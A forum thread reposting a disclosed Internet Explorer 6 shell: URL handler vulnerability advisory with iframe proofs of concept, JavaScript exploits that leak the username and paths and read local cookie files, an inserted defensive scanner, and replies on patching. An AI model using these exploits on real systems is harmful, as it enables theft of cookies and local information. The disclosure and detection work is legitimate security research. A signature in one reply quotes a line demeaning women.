Thread: shell url handler security issues

  1. #1

    shell url handler security issues

    This is a copy of the document I sent to securityfocus.com two days ago; hope you enjoy it.





    Internet Explorer shell URL handler:


    Shell URL handler security issues


    1) Shell URL handler vulnerability:
    There exists a security issue with the way Internet Explorer handles
    URLs containing the shell: URL handler. This can be used to extract
    information from the victim's system, which can be done by crafting HTML
    pages that contain the shell URL as src or href values. This
    vulnerability allows access to certain shell folders, for instance:




    shell:(shell folder name) ------> the URLs generally look like this.
    You can find the shell folder names by searching the registry for
    "shellfolder":
    shell:windows
    shell:cookies
    shell:recent
    shell:system
    shell:Common AppData
    shell:Common Desktop
    shell:Common Documents
    shell:Common Favorites
    shell:Common Programs
    shell:Common Start Menu
    shell:Common Startup
    shell:Common Templates
    shell:Common Administrative Tools
    shell:CommonVideo
    shell:CommonPictures
    shell:Personal
    shell:local appdata
    shell:profile
    shell:Administrative Tools

    .......


    proof of concept:


    ---------------------------------------------------------------------------
    <iframe id="Target" src='shell:windows' name="x" width="875" height="527">
    </iframe>
    ---------------------------------------------------------------------------


    This vulnerability alone is not that harmful, as the execution
    of only a limited set of files is possible (mainly those that IE normally can
    open: *.bmp, *.txt, *.log, *.jpeg, html, ...).

    It is, however, possible to change folders or use these shell folders
    to get access to other folders on the user's system:

    proof of concept:

    -------------------------------------------------------------------------------------------
    <iframe id="Target" src='shell:windows\system32\config\' name="x" width="875" height="527">
    </iframe>
    -------------------------------------------------------------------------------------------

    This gives exploits that can write to the user's system the ability to
    create files in exact locations on the user's system, for instance
    saving a trojan horse in the common startup folder, which would ensure the
    start of this program any time any of the users log on.


    2) CLSIDs and shell URL handler vulnerability:


    Shell folders that IE has access to can be accessed not only using
    their shell folder names but also by using CLSIDs pointing to those
    folders:

    shell:::(clsid)
    CLSIDs can be found here: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
    [folders]

    fonts shell:::{D20EA4E1-3957-11d2-A40B-0C5020524152}
    tasks shell:::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
    my computer shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
    downloaded files shell:::{88C6C381-2E85-11D0-94DE-444553540000}
    search shell:::{E17D4FC0-5564-11D1-83F2-00A0C90DC849}
    {2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}
    IE(homepage) shell:::{871C5380-42A0-1069-A2EA-08002B30309D}
    recycle bin shell:::{645FF040-5081-101B-9F08-00AA002F954E}
    network shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D}
    control panel shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}
    printers shell:::{2227A280-3AEA-1069-A2DE-08002B30309D}
    web folders shell:::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
    connection shell:::{992CFFA0-F557-101A-88EC-00DD010CCC48}
    my documents shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}
    administrative tools shell:::{D20EA4E1-3957-11d2-A40B-0C5020524153}
    briefcase shell:::{85BBD920-42A0-1069-A2E4-08002B30309D}
    scanners and cameras shell:::{E211B736-43FD-11D1-9EFB-0000F8757FCD}
    cabinet shell:::{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}
    startup shell:::{48e7caab-b918-4e58-a94d-505519c795dc}
    common startup shell:::{0DF44EAA-FF21-4412-828E-260A8728E7F1}
    programs folder shell:::{7be9d83c-a729-4d97-b5a7-1b7313c39e0a}
    activex folder shell:::{88C6C381-2E85-11D0-94DE-444553540000}
    .........

    Note: shell linking, when combined with CLSIDs on a local machine, can
    give users the ability to bypass some restrictions:



    Start > Run > shell:::{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} <press enter>
    --> the Folder Options dialog pops up



    proof of concept:

    -------------------------------------------------------------------------------------------
    <iframe id="Target" src='shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}' name="x" width="875" height="527">
    </iframe>
    -------------------------------------------------------------------------------------------


    Changing directories or folders is also possible with this
    vulnerability.


    shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:
    shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\a:
    shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\d:
    shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\e:

    proof of concept:

    -------------------------------------------------------------------------------------------
    <iframe id="Target" src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:' name="x" width="875" height="527">
    </iframe>
    -------------------------------------------------------------------------------------------


    It is also possible to change between shell folders using "::\clsid":



    proof of concept:

    -------------------------------------------------------------------------------------------
    <iframe id="Target" src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}' name="x" width="875" height="527">
    </iframe>
    -------------------------------------------------------------------------------------------


    If Internet Explorer is forced to open the "shell storage folder
    viewer" using this method, it causes Internet Explorer to crash,
    which closes all open windows:


    proof of concept:


    -------------------------------------------------------------------------------------------
    <iframe id="Target" src='{E773F1AF-3A65-4866-857D-846FC9C4598A}' name="x" width="875" height="527">
    </iframe>
    -------------------------------------------------------------------------------------------


    Programs like "NetMeeting" can somehow be run using this method:



    proof of concept:

    -------------------------------------------------------------------------------------------

    click


    -------------------------------------------------------------------------------------------
    * It is also possible to start MSN Messenger, but whether other
    programs can be run or not has not been tested.





    3) \shdoclc.dll\ vulnerability:

    When known files on the user's system are accessed using (shell:(shell
    folder name) or shell:::(clsid)), Internet Explorer does not open the
    file according to its file type but reacts to it as if it has been
    asked to download that file from the location. This is correct as far
    as IE itself cannot open that file (*.gif, *.bmp, *.txt, ...; for
    instance *.txt is opened using Notepad). When this happens the page
    that has tried to open the file causes an error which
    res://C:\WINHOLEZ\System32\shdoclc.dll\ responds to; the URL of the
    page generated by shdoclc.dll contains the location of that file,
    which can reveal important information.


    proof of concept:

    IE 6
    IE 6 + SP1

    ---------------------------------------------------------------------------------------------
    <html>
    <head>
    </head>
    <body onload=setTimeout("exploit()",4*100);>
    <iframe id="Target" width="0" height="0" src="shell:profile\ntuser.ini" name="Target" scrolling="yes">
    </iframe>
    <SCRIPT language=JavaScript>
    // Line breaks inside the strings below were lost when the post was
    // rendered; they are restored here as <br> tags (an assumption).
    function exploit(){
    // After the iframe fails to open ntuser.ini, its location holds the
    // res:// error URL that embeds the full local path of the file.
    loc=new String(Target.location);
    var len=loc.length;
    var n=loc.indexOf("Settings")+9;
    var m=loc.indexOf("System32");
    preuser=new String(loc.substring(n,len));
    p=preuser.indexOf("\\");
    user=new String(preuser.substring(0,p));
    winloc=new String(loc.substring(6,m));
    q=winloc.indexOf("\\");
    rootdrive=new String(winloc.substring(0,q+1));
    targetwin=window.open("");
    targetwin.document.write("Username : "+user+"<br>");
    targetwin.document.write("root drive : "+rootdrive+"<br>");
    targetwin.document.write("location of windows folder : "+winloc+"<br>");
    targetwin.document.write("location of user profile : "+rootdrive+"Documents and Settings\\"+user+"\\");
    targetwin.document.write("<br><br>Wallpaper :<br><br><img border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30% height=30%>");
    targetwin.document.write("<br><br>internet explorer wallpaper :<br><br><img border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Application Data\\Microsoft\\Internet Explorer\\Internet Explorer Wallpaper.bmp' width=30% height=30%><br>");
    }
    </SCRIPT>
    </body>
    </html>


    ---------------------------------------------------------------------------------------------




    proof of concept:

    (reading cookies)

    IE 6 only
    * On IE6 + SP1 the exploit won't work because the cookies folder cannot be
    accessed; this is due to the fact that the cookies folder is set to be
    part of Restricted Sites, for which the security level is high, and the
    script won't be effective.


    ---------------------------------------------------------------------------------------------

    <html>
    <head>
    </head>
    <body onload=setTimeout("exploit()",4*100);>
    <iframe id="Target" width="0" height="0" src="shell:profile\ntuser.ini" name="Target" scrolling="yes">
    </iframe>
    <SCRIPT language=JavaScript>
    // Line breaks inside the strings below were lost when the post was
    // rendered; they are restored here as <br> tags (an assumption).
    function exploit(){
    // Same path-leak step as the previous proof of concept.
    loc=new String(Target.location);
    var len=loc.length;
    var n=loc.indexOf("Settings")+9;
    var m=loc.indexOf("System32");
    preuser=new String(loc.substring(n,len));
    p=preuser.indexOf("\\");
    user=new String(preuser.substring(0,p));
    winloc=new String(loc.substring(6,m));
    q=winloc.indexOf("\\");
    rootdrive=new String(winloc.substring(0,q+1));
    targetwin=window.open("");
    targetwin.document.write("Username : "+user+"<br>");
    targetwin.document.write("root drive : "+rootdrive+"<br>");
    targetwin.document.write("location of windows folder : "+winloc+"<br>");
    targetwin.document.write("location of user profile : "+rootdrive+"Documents and Settings\\"+user+"\\");
    targetwin.document.write("<br><br>Wallpaper :<br><br><img border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30% height=30%>");
    targetwin.document.write("<br><br>internet explorer wallpaper :<br><br><img border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Application Data\\Microsoft\\Internet Explorer\\Internet Explorer Wallpaper.bmp' width=30% height=30%><br>");

    // Try the cookie files of three sites in turn.
    var k=0;
    Targeturln=new Array("");
    Targeturl=new Array("");
    Targeturln[0]="yahoo";
    Targeturln[1]="hotmail";
    Targeturln[2]="antionline";
    do{
    Targeturl=Targeturln[k];
    contentx=new Array(x(Targeturl));
    if(contentx!="") {
    targetwin.document.write("<br><br><font size=5>Contents of the cookie file(s) related to "+Targeturl+"</font><br><br><br><font>"+contentx+"</font><br>");
    }
    if(contentx==""){
    targetwin.document.write("<br><br><font size=5>No files found related to "+Targeturl+"</font><br><br>");
    }
    k++;
    }while(k<3);
    return false;
    }

    // Opens the cookie files user@url[0..3].txt and user@www.url[0..3].txt
    // from the profile and concatenates whatever text they contain.
    function x(url){
    content=new Array("");
    var i=0;
    do{
    cookie=window.open("shell:profile\\Local Settings\\Temp\\cookies\\"+user+"@"+url+"["+i+"].txt");
    if (cookie.document.body.innerText!="")
    content=content+"<br>"+user+"@"+url+"["+i+"].txt :"+"<br><br>"+cookie.document.body.innerText;
    cookie.close();
    i++;
    }while(i<=3);
    i=0;
    do{
    // The post had "@www"+url here, missing the dot used in the label below.
    cookie=window.open("shell:profile\\Local Settings\\Temp\\cookies\\"+user+"@www."+url+"["+i+"].txt");
    if (cookie.document.body.innerText!="")
    content=content+"<br>"+user+"@www."+url+"["+i+"].txt :"+"<br><br>"+cookie.document.body.innerText;
    cookie.close();
    i++;
    }while(i<=3);
    return content;
    }
    </SCRIPT>
    </body>
    </html>

    ---------------------------------------------------------------------------------------------


    Author: Roozbeh Afrasiabi

    roozbeh_afrasiabi@yahoo.com
    da_stone_cold_killer@yahoo.com

    All rights reserved

    Any changes to this document must be done with the permission of the
    author; you can store or use this information as long as it has not
    been changed.




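    A defender-side check for the URL shapes sections 1 and 2 of the advisory describe, added here as an example and not part of the original post or the author's code: it pulls URL-bearing attributes out of an HTML page and labels each shell: URL as a plain shell folder, a folder sub-path, a CLSID, a CLSID with a drive sub-path, or a CLSID chain. The sample page is constructed for the example.

```python
import re
from html.parser import HTMLParser

# Constructed sample page exercising each URL shape the advisory describes.
SAMPLE_HTML = """
<html><body>
<iframe id="Target" src='shell:windows' name="x"></iframe>
<iframe src='shell:windows\\system32\\config\\'></iframe>
<iframe src='shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}'></iframe>
<iframe src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\c:'></iframe>
<iframe src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\::{21EC2020-3AEA-1069-A2DD-08002B30309D}'></iframe>
<a href="http://www.example.com/page.html">harmless link</a>
<img src="shell:profile\\ntuser.ini">
</body></html>
"""

# A CLSID in its registry form {8-4-4-4-12 hex digits}, either case.
CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
URL_ATTRS = {"src", "href", "data", "action"}  # attributes the browser fetches

class _UrlAttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.urls = []  # (tag, attribute, value) for every URL-bearing attribute

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value is not None:
                self.urls.append((tag, name, value.strip()))

def classify_shell_url(url):
    """None for a non-shell URL, else the advisory's shape:
    folder, folder-path, clsid, clsid-path or clsid-chain."""
    if not url.lower().startswith("shell:"):
        return None
    rest = url[len("shell:"):]
    clsids = CLSID_RE.findall(rest)
    if rest.startswith("::") and clsids:
        if len(clsids) > 1:
            return "clsid-chain"  # shell:::{A}\::{B}, hopping between shell folders
        tail = rest.split("}", 1)[1]  # whatever follows the first CLSID
        return "clsid-path" if "\\" in tail else "clsid"  # e.g. a \c: drive sub-path
    return "folder-path" if "\\" in rest else "folder"  # shell:windows\... vs shell:windows

def find_shell_urls(html):
    """Scan a page; return (tag, attr, url, category) for every flagged URL."""
    parser = _UrlAttrCollector()
    parser.feed(html)
    hits = []
    for tag, attr, url in parser.urls:
        category = classify_shell_url(url)
        if category:
            hits.append((tag, attr, url, category))
    return hits
```

    Run `find_shell_urls` over fetched pages or proxy logs; any hit is worth blocking or alerting on, since no legitimate web page has a reason to reference shell: on a client.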

  2. #2
    Senior Member (Join Date: Nov 2001, Posts: 4,785)
    How did securityfocus respond?
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  3. #3

    What?

    I would like to know how securityfocus responded and what is the ultimate goal, eliminate the shell weakness?

  4. #4
    Senior Member Maestr0 (Join Date: May 2003, Posts: 604)
    What operating systems and builds of IE have you tested? I can't get IE to accept the shell: protocol. I remember reading about something like this with IE 5; it has something to do with explorer.exe, I think.

    -Maestr0
    "If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software." -Jaron Lanier

  5. #5
    Originally posted here by Tedob1
    How did securityfocus respond?
    http://www.securityfocus.com/bid/9628

    I would like to know how securityfocus responded and what is the ultimate goal, eliminate the shell weakness?
    Well, no solution from securityfocus, but it seems like fully patched systems are not vulnerable. By fully patched I mean you have to patch both the operating system and IE; that is what the guys at Secunia told me.

  6. #6
    Senior Member (Join Date: Nov 2001, Posts: 4,785)
    Some really nice work BTW. What patch fixes it? That is, how far back is "unprotected"?

  7. #7
    Senior Member (Join Date: Nov 2001, Posts: 4,785)
    I just noticed that this is a tutorial... so what brought you to these conclusions, or what made you investigate this in particular?

  8. #8
    Some really nice work BTW. What patch fixes it? That is, how far back is "unprotected"?
    Frankly, I don't know; even those gurus at Secunia and securityfocus got a little bit mixed up with this. I should have sent this to Microsoft in the first place; they give you more info on what patch fixes what and so on.


    I just noticed that this is a tutorial... so what brought you to these conclusions, or what made you investigate this in particular?
    I had known about it for a long time but never thought of reporting it (don't ask why); even the information I have shared here is not the whole thing.
